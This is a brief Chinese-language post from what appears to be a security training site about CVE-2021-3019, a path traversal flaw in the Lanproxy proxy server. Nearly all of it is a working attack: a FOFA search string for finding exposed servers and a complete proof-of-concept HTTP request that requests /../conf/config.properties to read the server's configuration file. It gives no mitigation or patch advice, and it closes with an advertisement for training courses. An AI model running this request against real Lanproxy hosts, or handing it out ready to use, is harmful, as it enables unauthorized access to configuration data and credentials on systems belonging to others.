CVE-2021-3019 Lanproxy 路径遍历漏洞
FOFA搜索:
header= “Server: LPS-0.1”
POC
GET /../conf/config.properties HTTP/1.1 Host: host:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json; charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 29 Origin: http://host:8090 Connection: close Referer: http://host:8090/ {"username":"","password":""}
Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » CVE-2021-3019 Lanproxy 路径遍历漏洞
天云网络培训 » CVE-2021-3019 Lanproxy 路径遍历漏洞